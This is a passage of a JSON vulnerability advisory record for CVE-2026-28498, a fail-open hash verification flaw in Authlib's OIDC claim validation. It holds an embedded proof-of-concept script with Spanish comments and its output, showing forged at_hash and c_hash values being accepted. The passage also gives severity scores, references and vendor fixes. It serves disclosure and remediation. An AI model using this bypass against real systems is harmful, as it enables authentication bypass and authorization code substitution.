\"real_access_token_from_AS\"\n fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n alg = \"CUSTOM_ALG\"\n\n half_hash = create_half_hash(token, alg)\n info(f\"create_half_hash(token, {alg!r}) -> {half_hash!r} (None = alg no soportado)\")\n\n result_vuln = authlib_verify_hash(fake_sig, token, alg)\n result_patched = _verify_hash_patched(fake_sig, token, alg)\n\n print()\n if result_vuln:\n fail(f\"authlib _verify_hash() retorno True con firma falsa y alg={alg!r}\")\n else:\n ok(f\"authlib _verify_hash() retorno False\")\n\n if not result_patched:\n ok(f\"_verify_hash_patched() retorno False (fail-closed correcto)\")\n else:\n fail(f\"_verify_hash_patched() retorno True\")\n\n# ─── test 2: IDToken.validate_at_hash() bypass ────────────────────────────────\n\ndef test_at_hash_bypass():\n \"\"\"\n @notice Demuestra el bypass end-to-end en IDToken.validate_at_hash().\n El atacante modifica el header alg del JWT a un valor no soportado.\n validate_at_hash() no levanta excepcion -> token aceptado.\n\n @dev Flujo real de authlib:\n validate_at_hash() -> _verify_hash(at_hash, access_token, alg)\n -> create_half_hash(access_token, \"CUSTOM_ALG\") -> None\n -> `if not None` -> True -> no InvalidClaimError -> BYPASS\n \"\"\"\n header(\"TEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\")\n\n real_token = \"ya29.LEGITIMATE_token_from_real_AS\"\n evil_token = \"ya29.MALICIOUS_token_under_attacker_control\"\n fake_at_hash = \"FAAAAAAAAAAAAAAAAAAAA\"\n\n # --- caso A: token legitimo con alg correcto ---\n correct_hash = at_hash_correct(real_token, \"RS256\")\n token_legit = IDToken(\n {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n \"at_hash\": correct_hash},\n {\"access_token\": real_token}\n )\n token_legit.header = {\"alg\": \"RS256\"}\n\n try:\n token_legit.validate_at_hash()\n ok(f\"Caso A (legitimo, RS256): at_hash={correct_hash} -> aceptado\")\n except Exception as e:\n fail(f\"Caso A rechazo el token legitimo: {e}\")\n\n # --- caso B: token malicioso con alg forjado ---\n token_forged = IDToken(\n {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n \"at_hash\": fake_at_hash},\n {\"access_token\": evil_token}\n )\n token_forged.header = {\"alg\": \"CUSTOM_ALG\"}\n\n try:\n token_forged.validate_at_hash()\n fail(f\"Caso B (atacante, alg=CUSTOM_ALG): at_hash={fake_at_hash} -> BYPASS exitoso\")\n info(f\"access_token del atacante aceptado: {evil_token}\")\n except Exception as e:\n ok(f\"Caso B rechazado correctamente: {e}\")\n\n# ─── test 3: HybridIDToken.validate_c_hash() bypass ──────────────────────────\n\ndef test_c_hash_bypass():\n \"\"\"\n @notice Mismo bypass pero para c_hash en Hybrid Flow.\n Permite Authorization Code Substitution Attack.\n @dev OIDC Core 1.0 s3.3.2.11 exige verificacion obligatoria de c_hash.\n Authlib la omite cuando el alg es desconocido.\n \"\"\"\n header(\"TEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\")\n\n real_code = \"SplxlOBeZQQYbYS6WxSbIA\"\n evil_code = \"ATTACKER_FORGED_AUTH_CODE\"\n fake_chash = \"ZZZZZZZZZZZZZZZZZZZZZZ\"\n\n token = HybridIDToken(\n {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n \"nonce\": \"n123\", \"at_hash\": \"AAAA\", \"c_hash\": fake_chash},\n {\"code\": evil_code, \"access_token\": \"sometoken\"}\n )\n token.header = {\"alg\": \"XX9999\"}\n\n try:\n token.validate_c_hash()\n fail(f\"c_hash={fake_chash!r} aceptado con alg=XX9999 -> Authorization Code Substitution posible\")\n info(f\"code del atacante aceptado: {evil_code}\")\n except Exception as e:\n ok(f\"Rechazado correctamente: {e}\")\n\n# ─── test 4: superficie de ataque ─────────────────────────────────────────────\n\ndef test_attack_surface():\n \"\"\"\n @notice Mapea todos los valores de alg que disparan el bypass.\n @dev create_half_hash hace: getattr(hashlib, f\"sha{alg[2:]}\", None)\n Cualquier string que no resuelva a un atributo de hashlib -> None -> bypass.\n \"\"\"\n header(\"TEST 4 - Superficie de Ataque\")\n\n token = \"test_token\"\n fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n\n vectors = [\n \"CUSTOM_ALG\", \"XX9999\", \"none\", \"None\", \"\", \"RS\", \"SHA256\",\n \"HS0\", \"EdDSA256\", \"PS999\", \"RS 256\", \"../../../etc\", \"' OR '1'='1\",\n ]\n\n print(f\" {'alg':<22} {'half_hash':<10} resultado\")\n print(f\" {'-'*22} {'-'*10} {'-'*20}\")\n\n for alg in vectors:\n hv = create_half_hash(token, alg)\n result = authlib_verify_hash(fake_sig, token, alg)\n hv_str = \"None\" if hv is None else \"bytes\"\n res_str = f\"{RED}BYPASS{R}\" if result else f\"{GRN}OK{R}\"\n print(f\" {alg!r:<22} {hv_str:<10} {res_str}\")\n\n# ─── main ─────────────────────────────────────────────────────────────────────\n\nif __name__ == \"__main__\":\n print(f\"\\n{BLD}authlib {authlib.__version__} - OIDC Hash Verification Bypass PoC{R}\")\n print(f\"authlib/oidc/core/claims.py :: _verify_hash() \\n\")\n\n test_root_cause()\n test_at_hash_bypass()\n test_c_hash_bypass()\n test_attack_surface()\n\n print(f\"\\n{DIM}Fix: `if not hash_value` -> `if hash_value is None` en _verify_hash(){R}\\n\")\n```\n\n---\n\n## Output\n\n```bash\nuthlib 1.6.8 - OIDC Hash Verification Bypass PoC\nauthlib/oidc/core/claims.py :: _verify_hash() \n\n\n────────────────────────────────────────────────────────────────\nTEST 1 - Root Cause: create_half_hash() + _verify_hash()\n────────────────────────────────────────────────────────────────\n create_half_hash(token, 'CUSTOM_ALG') -> None (None = alg no soportado)\n\n [BYPASS] authlib _verify_hash() retorno True con firma falsa y alg='CUSTOM_ALG'\n [OK] _verify_hash_patched() retorno False (fail-closed correcto)\n\n────────────────────────────────────────────────────────────────\nTEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\n────────────────────────────────────────────────────────────────\n [OK] Caso A (legitimo, RS256): at_hash=gh_beqqliVkRPAXdOz2Gbw -> aceptado\n [BYPASS] Caso B (atacante, alg=CUSTOM_ALG): at_hash=FAAAAAAAAAAAAAAAAAAAA -> BYPASS exitoso\n access_token del atacante aceptado: ya29.MALICIOUS_token_under_attacker_control\n\n────────────────────────────────────────────────────────────────\nTEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\n────────────────────────────────────────────────────────────────\n [BYPASS] c_hash='ZZZZZZZZZZZZZZZZZZZZZZ' aceptado con alg=XX9999 -> Authorization Code Substitution posible\n code del atacante aceptado: ATTACKER_FORGED_AUTH_CODE\n\n────────────────────────────────────────────────────────────────\nTEST 4 - Superficie de Ataque\n────────────────────────────────────────────────────────────────\n alg half_hash resultado\n ---------------------- ---------- --------------------\n 'CUSTOM_ALG' None BYPASS\n 'XX9999' None BYPASS\n 'none' None BYPASS\n 'None' None BYPASS\n '' None BYPASS\n 'RS' None BYPASS\n 'SHA256' None BYPASS\n 'HS0' None BYPASS\n 'EdDSA256' None BYPASS\n 'PS999' None BYPASS\n 'RS 256' None BYPASS\n '../../../etc' None BYPASS\n \"' OR '1'='1\" None BYPASS\n\nFix: `if not hash_value` -> `if hash_value is None` en _verify_hash()\n```", "title": "github - https://api.github.com/advisories/GHSA-m344-f55w-2m6j" }, { "category": "description", "text": "Affected versions of the authlib package are vulnerable to Improper Input Validation due to fail-open cryptographic hash verification for unsupported OIDC signing algorithms. The vulnerability exists in _verify_hash(signature, s, alg) in authlib/oidc/core/claims.py, which calls create_half_hash(s, alg) from authlib/oidc/core/util.py and incorrectly returns True when an unrecognised alg value causes the helper to return None, allowing IDToken.validate() and related OIDC claim validation to accept invalid at_hash or c_hash bindings.", "title": "pyupio - https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6309.json" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6404.json" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6497.json" }, { "category": "other", "text": "0.00012", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "title": "CVSSV4" }, { "category": "other", "text": "8.2", "title": "CVSSV4 base score" }, { "category": "other", "text": "4.1", "title": "NCSC Score" }, { "category": "other", "text": "The value of the most recent CVSS (V3) score, VENDOR FIX as product remediation category, Is related to an uncommon cwe id, There is product data available from source Certbundde", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to a product by vendor Unknown", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "fixed": [ "CSAFPID-5973065", "CSAFPID-5986173" ], "known_affected": [ "CSAFPID-5830119", "CSAFPID-1439279", "CSAFPID-1439313", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1508257", "CSAFPID-2831634", "CSAFPID-5035448", "CSAFPID-5068100", "CSAFPID-5068103", "CSAFPID-5068105", "CSAFPID-5068108", "CSAFPID-5068110", "CSAFPID-5068114", "CSAFPID-5068116", "CSAFPID-5068119", "CSAFPID-5068121", "CSAFPID-5068123", "CSAFPID-5068126", "CSAFPID-5068128", "CSAFPID-5068131", "CSAFPID-5068134", "CSAFPID-5155537", "CSAFPID-5155538", "CSAFPID-5222639", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5355695", "CSAFPID-5811359", "CSAFPID-1405217", "CSAFPID-1405218", "CSAFPID-5970752", "CSAFPID-1384077", "CSAFPID-5354794", "CSAFPID-1317174", "CSAFPID-1317175", "CSAFPID-1330296" ], "known_not_affected": [ "CSAFPID-5474797", "CSAFPID-5474798", "CSAFPID-5973066", "CSAFPID-5973067", "CSAFPID-5973068", "CSAFPID-5973069", "CSAFPID-5973070", "CSAFPID-5973071", "CSAFPID-5973072", "CSAFPID-5973073", "CSAFPID-5973074", "CSAFPID-5973075", "CSAFPID-5973076", "CSAFPID-5973077", "CSAFPID-5973078", "CSAFPID-5973079", "CSAFPID-5973080", "CSAFPID-5973081", "CSAFPID-5973082", "CSAFPID-5973083", "CSAFPID-5973084", "CSAFPID-5973085", "CSAFPID-5973086", "CSAFPID-5973087", "CSAFPID-5973088", "CSAFPID-5973089", "CSAFPID-5973090", "CSAFPID-5973091", "CSAFPID-5973092", "CSAFPID-5984227", "CSAFPID-5986174", "CSAFPID-5986175", "CSAFPID-5986176", "CSAFPID-5986177", "CSAFPID-5986178", "CSAFPID-5986179", "CSAFPID-5986180", "CSAFPID-5986181", "CSAFPID-5986182" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-m344-f55w-2m6j" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-m344-f55w-2m6j" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28498" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-28498" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/28xxx/CVE-2026-28498.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-28498" }, { "category": "external", "summary": "Source raw - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28498.json" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-28498" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28498" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-m344-f55w-2m6j" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - pyupio", "url": "https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "external", "summary": "Source - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0935.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6309.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6404.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6497.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/authlib/authlib/releases/tag/v1.6.9" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-m344-f55w-2m6j" }, { "category": "external", "summary": "Reference - github; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-28498" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0935.json" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0935" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://access.redhat.com/errata/RHSA-2026:6308" }, { "category": "external", "summary": "Reference - certbundde; redhat", "url": "https://access.redhat.com/errata/RHSA-2026:6309" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-28498" }, { "category": "external", "summary": "Reference - redhat", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448182" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-26007" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-25639" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-69223" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-69873" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-1615" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-28802" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-29074" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-30827" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-30922" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/updates/classification/" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-25990" }, { "category": "external", "summary": "Reference - redhat", "url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/html/release_notes/patch_releases" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6309.json" }, { "category": "external", "summary": "Reference - certbundde; redhat", "url": "https://access.redhat.com/errata/RHSA-2026:6404" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://access.redhat.com/errata/RHSA-2026:6278" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://alas.aws.amazon.com/AL2/ALAS2-2026-3215.html" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://lists.suse.com/pipermail/sle-security-updates/2026-April/025088.html" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6404.json" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/errata/RHSA-2026:6497" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-13465" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61726" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61728" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-68121" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-68158" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-26996" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27628" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27904" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6497.json" } ], "remediations": [ { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade", "product_ids": [ "CSAFPID-5153949", "CSAFPID-5973065" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:6309" }, { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade", "product_ids": [ "CSAFPID-5153949", "CSAFPID-5973065" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:6404" }, { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "CSAFPID-5278082", "CSAFPID-5986173" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:6497" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL" }, "products": [ "CSAFPID-1317174", "CSAFPID-1317175", "CSAFPID-1330296", "CSAFPID-1384077", "CSAFPID-1405217", "CSAFPID-1405218", "CSAFPID-1439279", "CSAFPID-1439313", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1508257", "CSAFPID-2831634", "CSAFPID-5035448", "CSAFPID-5068100", "CSAFPID-5068103", "CSAFPID-5068105", "CSAFPID-5068108", "CSAFPID-5068110", "CSAFPID-5068114", "CSAFPID-5068116", "CSAFPID-5068119", "CSAFPID-5068121", "CSAFPID-5068123", "CSAFPID-5068126", "CSAFPID-5068128", "CSAFPID-5068131", "CSAFPID-5068134", "CSAFPID-5155537", "CSAFPID-5155538", "CSAFPID-5222639", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5354794", "CSAFPID-5355695", "CSAFPID-5811359", "CSAFPID-5830119", "CSAFPID-5970752" ] } ], "title": "CVE-2026-28498" } ] }